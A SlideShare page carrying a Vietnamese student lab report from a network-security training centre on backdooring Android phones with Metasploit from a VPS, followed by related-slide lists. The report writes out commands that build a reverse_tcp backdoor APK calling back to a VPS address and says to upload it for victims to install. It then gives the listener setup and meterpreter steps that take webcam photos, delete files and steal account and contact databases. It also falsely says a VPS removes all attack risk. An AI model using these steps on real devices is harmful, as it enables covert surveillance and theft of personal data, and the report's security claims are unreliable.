SlideShare a Scribd company logo
1 of 13
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
1
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÀI BÁO CÁO 4
Hack android dùng metasploit cài trên VPS
CBHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
2
Mục lục
1. VPS là gì?..................................................................................................................................3
2. Các tính năng và lợi ích của VPS...............................................................................................3
3. Hack android sử dụng metaspoit cài trên VPS ..........................................................................4
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
3
1. VPS là gì?
Máy chủ ảo (Virtual Private Server - VPS) là phương pháp phân chia một máy chủ vật lý thành
nhiều máy chủ ảo chạy dưới dạng chia sẻ tài nguyên từ máy chủ vật lý ban đầu. Trong khi trên 1
server chạy Share Host thì có thể có hàng trăm tài khoản cùng chạy 1 lúc, nhưng trên server chạy
VPS thì con số chỉ bằng 1/10. Do vây, VPS có hiệu năng cao hơn Share Host rất nhiều lần.
Khác với hosting sử dụng phần mềm quản lý (hosting control panel) để khởi tạo và quản lý các
gói hosting, VPS được tạo ra nhờ công nghệ ảo hóa. Số lượng VPS luôn thấp hơn nhiều lần so với
số lượng hosting nếu cài đặt trên cùng một hệ thống server, do đó tính ổn định và hiệu suất sử dụng
tài nguyên của VPS luôn vượt trội so với hosting.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản
lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị tấn
công.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server,
nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng
server, riêng server VPS, một tài khoản VPS bị tấn công thì mọi tài khoản VPS khác trên server
đều không bị ảnh hưởng.
2. Các tính năng và lợi ích của VPS
Toàn quyền quản lý với tính năng như một máy chủ độc lập.
Độ ổn định và bảo mật cao.
Dễ dàng nâng cấp tài nguyên mà không làm gián đoạn dịch vụ.
Quản trị từ xa, cài đặt các phần mềm và ứng dụng theo nhu cầu
Kết nối Internet với 01 IP tĩnh.
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng Ram
riêng, dung lượng ổ HDD riêng, địa chỉ Ip riêng và hệ điều hành riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể
cài đặt để thực hiện những nhu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS,
download/upload bittorent với tốc độ cao...
Trong trường hợp VPS bị thiếu tài nguyên có thể dễ dàng nâng cấp thêm tài nguyên mà không
phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành vời thời gian từ 5-10 phút
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
4
3. Hack android sử dụng metaspoit cài trên VPS
Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor:
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R>
/root/Desktop/app.apk
Trong đó 14.0.21.184 là địa chỉ máy VPS của ta. /root/Desktop/app.apk là đường dẫn chứa file
vừa tạo.
Sauk hi tạo một backdoor được tạo, ta tải nó lên mạng.
Chờ máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới:
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
5
Ta vào máy VPS và mở Metasploit Console lên
Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một liên kết với máy android mà ta sẽ hack:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 14.0.21.184
set lport 4444
run
Chú ý: lhost và lport phải giống với lhost và lport khi tạo backdoor
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
6
Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối
Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
7
Ta dùng lệnh sysinfo để xem thông tin máy android
Ta dùng lênh webcam_list để xem danh sách các camera
Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android.
Trong đó: x là 1: Back Camera
2: Front Camera
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
8
Để di chuyển đến thư mục nào ta dụng lệnh cd <đường dẫn đến thư mục>
Lệnh ls để xem trong thư mục có những gì
Ta vào thư mục /sdcard/Download để down file về
Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
9
Muốn xóa một file ta dùng lệnh rm <tên file>
Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này
phải được root trước đó.
Ta dùng lênh shell để vào hệ thống
Dùng lệnh su để toàn quyền truy cập
Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là
unknown uid 0
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
10
Ta gõ cd /data/system để vào thư mục system
Tiếp theo gõ ls –l để xem trong thư mục có gì
Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
11
Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh
download file accounts.db về máy VPS của chúng ta
Tiếp tục ta vào địa chỉ
/data/data/com.android.providers.contacts/databases
để copy file contacts2.db về Sdcard
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
12
Sau đó ta download file contacts2.db về máy VPS
Bên dưới là danh sách danh bạ ta down từ máy android đã được root. Ta mở file *.db bằng phần
mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của chúng ta
Hết
Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6
13

More Related Content

What's hot

Cài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaCài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaHoàng Phúc Phạm
 
Part 31 internet information service - iis -www.key4_vip.info
Part 31   internet information service - iis -www.key4_vip.infoPart 31   internet information service - iis -www.key4_vip.info
Part 31 internet information service - iis -www.key4_vip.infolaonap166
 
Cấu hình và bảo mật cho Ubuntu Server
Cấu hình và bảo mật cho Ubuntu Server Cấu hình và bảo mật cho Ubuntu Server
Cấu hình và bảo mật cho Ubuntu Server Ho Quang Thanh
 
Hướng dẫn cài đặt cent os 6.5
Hướng dẫn cài đặt cent os 6.5Hướng dẫn cài đặt cent os 6.5
Hướng dẫn cài đặt cent os 6.5thienma217
 
Google chrome os (perfect version)
Google chrome os (perfect version)Google chrome os (perfect version)
Google chrome os (perfect version)En Tj Pj
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
It monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thangIt monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thanglaonap166
 
Cấu hình chống spam mail exim trên cpanel
Cấu hình chống spam mail exim trên cpanelCấu hình chống spam mail exim trên cpanel
Cấu hình chống spam mail exim trên cpanellaonap166
 
Báo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-AthenaBáo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-Athenaquocluong
 
Athena - Mail server VPS
Athena - Mail server VPSAthena - Mail server VPS
Athena - Mail server VPSNgô Hùng
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxLê Lãnh
 
Virtualization – Proxmox
Virtualization – ProxmoxVirtualization – Proxmox
Virtualization – Proxmoxlaonap166
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5Chuc Thanh
 
Báo cáo đề tài Nghiên cứu và triển khai hệ thống ISA server 2006
Báo cáo đề tài Nghiên cứu và triển khai hệ thống ISA server 2006Báo cáo đề tài Nghiên cứu và triển khai hệ thống ISA server 2006
Báo cáo đề tài Nghiên cứu và triển khai hệ thống ISA server 2006Vo Ve Vi Vu
 
Noi dung ghostcast server 27.11.2011
Noi dung ghostcast server 27.11.2011Noi dung ghostcast server 27.11.2011
Noi dung ghostcast server 27.11.2011laonap166
 
Raid trong-windows-server
Raid trong-windows-serverRaid trong-windows-server
Raid trong-windows-serverlaonap166
 
Tóm tắt lệnh Ubuntu
Tóm tắt lệnh UbuntuTóm tắt lệnh Ubuntu
Tóm tắt lệnh UbuntuQuang Ngoc
 

What's hot (20)

Cài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-AthenaCài đặt web server (linux)-Pham Hoang Phuc-Athena
Cài đặt web server (linux)-Pham Hoang Phuc-Athena
 
Bc athena cuoi ky
Bc athena cuoi kyBc athena cuoi ky
Bc athena cuoi ky
 
Part 31 internet information service - iis -www.key4_vip.info
Part 31   internet information service - iis -www.key4_vip.infoPart 31   internet information service - iis -www.key4_vip.info
Part 31 internet information service - iis -www.key4_vip.info
 
Cấu hình và bảo mật cho Ubuntu Server
Cấu hình và bảo mật cho Ubuntu Server Cấu hình và bảo mật cho Ubuntu Server
Cấu hình và bảo mật cho Ubuntu Server
 
Hướng dẫn cài đặt cent os 6.5
Hướng dẫn cài đặt cent os 6.5Hướng dẫn cài đặt cent os 6.5
Hướng dẫn cài đặt cent os 6.5
 
Vps
VpsVps
Vps
 
Google chrome os (perfect version)
Google chrome os (perfect version)Google chrome os (perfect version)
Google chrome os (perfect version)
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMware
 
It monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thangIt monitoring with nagios lac tien man thang
It monitoring with nagios lac tien man thang
 
Cấu hình chống spam mail exim trên cpanel
Cấu hình chống spam mail exim trên cpanelCấu hình chống spam mail exim trên cpanel
Cấu hình chống spam mail exim trên cpanel
 
Báo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-AthenaBáo cáo thực tập doanh nghiệp-Athena
Báo cáo thực tập doanh nghiệp-Athena
 
Athena - Mail server VPS
Athena - Mail server VPSAthena - Mail server VPS
Athena - Mail server VPS
 
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docxHướng dẫn cài đặt kali linux trên máy ảo vmware.docx
Hướng dẫn cài đặt kali linux trên máy ảo vmware.docx
 
Virtualization – Proxmox
Virtualization – ProxmoxVirtualization – Proxmox
Virtualization – Proxmox
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
 
Báo cáo đề tài Nghiên cứu và triển khai hệ thống ISA server 2006
Báo cáo đề tài Nghiên cứu và triển khai hệ thống ISA server 2006Báo cáo đề tài Nghiên cứu và triển khai hệ thống ISA server 2006
Báo cáo đề tài Nghiên cứu và triển khai hệ thống ISA server 2006
 
bao cao tuan 1
bao cao tuan 1bao cao tuan 1
bao cao tuan 1
 
Noi dung ghostcast server 27.11.2011
Noi dung ghostcast server 27.11.2011Noi dung ghostcast server 27.11.2011
Noi dung ghostcast server 27.11.2011
 
Raid trong-windows-server
Raid trong-windows-serverRaid trong-windows-server
Raid trong-windows-server
 
Tóm tắt lệnh Ubuntu
Tóm tắt lệnh UbuntuTóm tắt lệnh Ubuntu
Tóm tắt lệnh Ubuntu
 

Viewers also liked

Baocaothuctapketoandoanhthuvaxacdinhketquakinhdoanh 121018211648-phpapp02 (1)
Baocaothuctapketoandoanhthuvaxacdinhketquakinhdoanh 121018211648-phpapp02 (1)Baocaothuctapketoandoanhthuvaxacdinhketquakinhdoanh 121018211648-phpapp02 (1)
Baocaothuctapketoandoanhthuvaxacdinhketquakinhdoanh 121018211648-phpapp02 (1)Lò Bánh Tráng
 
Ma hoa-nguồn
Ma hoa-nguồnMa hoa-nguồn
Ma hoa-nguồnHieu Tran
 
bao cao thuc tap cuoi ky
bao cao thuc tap cuoi kybao cao thuc tap cuoi ky
bao cao thuc tap cuoi kyTiêu Dao
 
Bài tập nhập môn lập trình
Bài tập nhập môn lập trìnhBài tập nhập môn lập trình
Bài tập nhập môn lập trìnhLong Kingnam
 
Phuong phap luan nckh(3)
Phuong phap luan nckh(3)Phuong phap luan nckh(3)
Phuong phap luan nckh(3)Tran Chi
 
Tìm hiểu và triển khai các dịch vụ trên Windows Server 2008
Tìm hiểu và triển khai các dịch vụ trên Windows Server 2008Tìm hiểu và triển khai các dịch vụ trên Windows Server 2008
Tìm hiểu và triển khai các dịch vụ trên Windows Server 2008Long Kingnam
 
Báo cáo ý tưởng thiết kế
Báo cáo ý tưởng thiết kếBáo cáo ý tưởng thiết kế
Báo cáo ý tưởng thiết kếLong Kingnam
 
127918321 nghien-cuu-ma-turbo
127918321 nghien-cuu-ma-turbo127918321 nghien-cuu-ma-turbo
127918321 nghien-cuu-ma-turboHieu Tran
 
Thực tập tốt nghiệp Tu Du Hospital
Thực tập tốt nghiệp Tu Du HospitalThực tập tốt nghiệp Tu Du Hospital
Thực tập tốt nghiệp Tu Du HospitalNgo Quoc Nguyen
 
Khóa luận nâng cao hiệu quả hoạt động sản xuất kinh doanh xi măng quán triều ...
Khóa luận nâng cao hiệu quả hoạt động sản xuất kinh doanh xi măng quán triều ...Khóa luận nâng cao hiệu quả hoạt động sản xuất kinh doanh xi măng quán triều ...
Khóa luận nâng cao hiệu quả hoạt động sản xuất kinh doanh xi măng quán triều ...Trần Trung
 
Báo cáo kế toán xí nghiệp xuất nhập khẩu và dịch vụ tổng hợp
Báo cáo kế toán xí nghiệp xuất nhập khẩu và dịch vụ tổng hợpBáo cáo kế toán xí nghiệp xuất nhập khẩu và dịch vụ tổng hợp
Báo cáo kế toán xí nghiệp xuất nhập khẩu và dịch vụ tổng hợpNhat Anh
 
Khóa luận tốt nghiệp1
Khóa luận tốt nghiệp1Khóa luận tốt nghiệp1
Khóa luận tốt nghiệp1Ngo Quoc Nguyen
 
Xml xay dung_he_thong_ho_tro_khach_hang
Xml xay dung_he_thong_ho_tro_khach_hangXml xay dung_he_thong_ho_tro_khach_hang
Xml xay dung_he_thong_ho_tro_khach_hangViet Nam
 
Bao cao do an Phát triển hệ thống game server Online
Bao cao do an Phát triển hệ thống game server OnlineBao cao do an Phát triển hệ thống game server Online
Bao cao do an Phát triển hệ thống game server OnlineHoàng Phạm
 

Viewers also liked (20)

Baocaothuctapketoandoanhthuvaxacdinhketquakinhdoanh 121018211648-phpapp02 (1)
Baocaothuctapketoandoanhthuvaxacdinhketquakinhdoanh 121018211648-phpapp02 (1)Baocaothuctapketoandoanhthuvaxacdinhketquakinhdoanh 121018211648-phpapp02 (1)
Baocaothuctapketoandoanhthuvaxacdinhketquakinhdoanh 121018211648-phpapp02 (1)
 
Ma hoa-nguồn
Ma hoa-nguồnMa hoa-nguồn
Ma hoa-nguồn
 
bao cao thuc tap cuoi ky
bao cao thuc tap cuoi kybao cao thuc tap cuoi ky
bao cao thuc tap cuoi ky
 
3.cty dệt hà nam
3.cty dệt hà nam3.cty dệt hà nam
3.cty dệt hà nam
 
LOGMan V7
LOGMan V7LOGMan V7
LOGMan V7
 
Bài tập nhập môn lập trình
Bài tập nhập môn lập trìnhBài tập nhập môn lập trình
Bài tập nhập môn lập trình
 
Phuong phap luan nckh(3)
Phuong phap luan nckh(3)Phuong phap luan nckh(3)
Phuong phap luan nckh(3)
 
Tìm hiểu và triển khai các dịch vụ trên Windows Server 2008
Tìm hiểu và triển khai các dịch vụ trên Windows Server 2008Tìm hiểu và triển khai các dịch vụ trên Windows Server 2008
Tìm hiểu và triển khai các dịch vụ trên Windows Server 2008
 
Báo cáo ý tưởng thiết kế
Báo cáo ý tưởng thiết kếBáo cáo ý tưởng thiết kế
Báo cáo ý tưởng thiết kế
 
127918321 nghien-cuu-ma-turbo
127918321 nghien-cuu-ma-turbo127918321 nghien-cuu-ma-turbo
127918321 nghien-cuu-ma-turbo
 
Thực tập tốt nghiệp Tu Du Hospital
Thực tập tốt nghiệp Tu Du HospitalThực tập tốt nghiệp Tu Du Hospital
Thực tập tốt nghiệp Tu Du Hospital
 
BAO.CAO.CUOI.KY
BAO.CAO.CUOI.KYBAO.CAO.CUOI.KY
BAO.CAO.CUOI.KY
 
Khóa luận nâng cao hiệu quả hoạt động sản xuất kinh doanh xi măng quán triều ...
Khóa luận nâng cao hiệu quả hoạt động sản xuất kinh doanh xi măng quán triều ...Khóa luận nâng cao hiệu quả hoạt động sản xuất kinh doanh xi măng quán triều ...
Khóa luận nâng cao hiệu quả hoạt động sản xuất kinh doanh xi măng quán triều ...
 
Báo cáo kế toán xí nghiệp xuất nhập khẩu và dịch vụ tổng hợp
Báo cáo kế toán xí nghiệp xuất nhập khẩu và dịch vụ tổng hợpBáo cáo kế toán xí nghiệp xuất nhập khẩu và dịch vụ tổng hợp
Báo cáo kế toán xí nghiệp xuất nhập khẩu và dịch vụ tổng hợp
 
Khóa luận tốt nghiệp1
Khóa luận tốt nghiệp1Khóa luận tốt nghiệp1
Khóa luận tốt nghiệp1
 
Aspnet 3.5_03
Aspnet 3.5_03Aspnet 3.5_03
Aspnet 3.5_03
 
De5 gsm
De5 gsmDe5 gsm
De5 gsm
 
5.NGUYEN TRUONG DUY.doc
5.NGUYEN TRUONG DUY.doc5.NGUYEN TRUONG DUY.doc
5.NGUYEN TRUONG DUY.doc
 
Xml xay dung_he_thong_ho_tro_khach_hang
Xml xay dung_he_thong_ho_tro_khach_hangXml xay dung_he_thong_ho_tro_khach_hang
Xml xay dung_he_thong_ho_tro_khach_hang
 
Bao cao do an Phát triển hệ thống game server Online
Bao cao do an Phát triển hệ thống game server OnlineBao cao do an Phát triển hệ thống game server Online
Bao cao do an Phát triển hệ thống game server Online
 

Similar to Bai bao cao 4

Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSLê Lãnh
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6kakawpah0911
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6phanconghien
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vpsHường Tô
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Trọng An
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công androidAnh Hiếu
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲkakawpah0911
 
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬPHƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬPdvms
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploitLê Lãnh
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxHường Tô
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1kakawpah0911
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocXuân Ngọc Nguyễn
 
Tìm Hiểu Giải Pháp Ảo Hóa Mã Nguồn Mở KVM Và Triển Khai Thử Nghiệm
Tìm Hiểu Giải Pháp Ảo Hóa Mã Nguồn Mở KVM Và Triển Khai Thử Nghiệm Tìm Hiểu Giải Pháp Ảo Hóa Mã Nguồn Mở KVM Và Triển Khai Thử Nghiệm
Tìm Hiểu Giải Pháp Ảo Hóa Mã Nguồn Mở KVM Và Triển Khai Thử Nghiệm nataliej4
 

Similar to Bai bao cao 4 (20)

Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPS
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
 
Bai bao cao 3
Bai bao cao 3Bai bao cao 3
Bai bao cao 3
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
 
Tạo mã độc trên vps
Tạo mã độc trên vpsTạo mã độc trên vps
Tạo mã độc trên vps
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
 
Vũ thanh hiếu tạo mã độc trên vps tấn công android
Vũ thanh hiếu   tạo mã độc trên vps tấn công androidVũ thanh hiếu   tạo mã độc trên vps tấn công android
Vũ thanh hiếu tạo mã độc trên vps tấn công android
 
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬPHƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
HƯỚNG DẪN SỬ DỤNG PHẦN MỀM SUBVERSION (SVN) TOÀN TẬP
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploit
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
1
11
1
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
 
Tìm Hiểu Giải Pháp Ảo Hóa Mã Nguồn Mở KVM Và Triển Khai Thử Nghiệm
Tìm Hiểu Giải Pháp Ảo Hóa Mã Nguồn Mở KVM Và Triển Khai Thử Nghiệm Tìm Hiểu Giải Pháp Ảo Hóa Mã Nguồn Mở KVM Và Triển Khai Thử Nghiệm
Tìm Hiểu Giải Pháp Ảo Hóa Mã Nguồn Mở KVM Và Triển Khai Thử Nghiệm
 

More from tuankiet123

Tạo bài viết trên joomla
Tạo bài viết trên joomlaTạo bài viết trên joomla
Tạo bài viết trên joomlatuankiet123
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tậptuankiet123
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kìtuankiet123
 
Báo cáo giữa kỳ
Báo cáo giữa kỳBáo cáo giữa kỳ
Báo cáo giữa kỳtuankiet123
 
Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1tuankiet123
 
Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1tuankiet123
 

More from tuankiet123 (9)

Tạo bài viết trên joomla
Tạo bài viết trên joomlaTạo bài viết trên joomla
Tạo bài viết trên joomla
 
Joomla
JoomlaJoomla
Joomla
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tập
 
Báo cáo thực tập cuối kì
Báo cáo thực tập cuối kìBáo cáo thực tập cuối kì
Báo cáo thực tập cuối kì
 
Báo cáo giữa kỳ
Báo cáo giữa kỳBáo cáo giữa kỳ
Báo cáo giữa kỳ
 
Bai bao cao 2
Bai bao cao 2Bai bao cao 2
Bai bao cao 2
 
Bai bao cao 2
Bai bao cao 2Bai bao cao 2
Bai bao cao 2
 
Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1
 
Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1
 

Bai bao cao 4

  • 1. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 1 TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÀI BÁO CÁO 4 Hack android dùng metasploit cài trên VPS CBHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt
  • 2. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 2 Mục lục 1. VPS là gì?..................................................................................................................................3 2. Các tính năng và lợi ích của VPS...............................................................................................3 3. Hack android sử dụng metaspoit cài trên VPS ..........................................................................4
  • 3. Nguyễn Tuấn Kiệt – Lớp CNTT – Ca sáng 2-4-6 3 1. VPS là gì? Máy chủ ảo (Virtual Private Server - VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo chạy dưới dạng chia sẻ tài nguyên từ máy chủ vật lý ban đầu. Trong khi trên 1 server chạy Share Host thì có thể có hàng trăm tài khoản cùng chạy 1 lúc, nhưng trên server chạy VPS thì con số chỉ bằng 1/10. Do vây, VPS có hiệu năng cao hơn Share Host rất nhiều lần. Khác với hosting sử dụng phần mềm quản lý (hosting control panel) để khởi tạo và quản lý các gói hosting, VPS được tạo ra nhờ công nghệ ảo hóa. Số lượng VPS luôn thấp hơn nhiều lần so với số lượng hosting nếu cài đặt trên cùng một hệ thống server, do đó tính ổn định và hiệu suất sử dụng tài nguyên của VPS luôn vượt trội so với hosting. Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị tấn công. Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản VPS bị tấn công thì mọi tài khoản VPS khác trên server đều không bị ảnh hưởng. 2. Các tính năng và lợi ích của VPS Toàn quyền quản lý với tính năng như một máy chủ độc lập. Độ ổn định và bảo mật cao. Dễ dàng nâng cấp tài nguyên mà không làm gián đoạn dịch vụ. Quản trị từ xa, cài đặt các phần mềm và ứng dụng theo nhu cầu Kết nối Internet với 01 IP tĩnh. Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng Ram riêng, dung lượng ổ HDD riêng, địa chỉ Ip riêng và hệ điều hành riêng. Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt 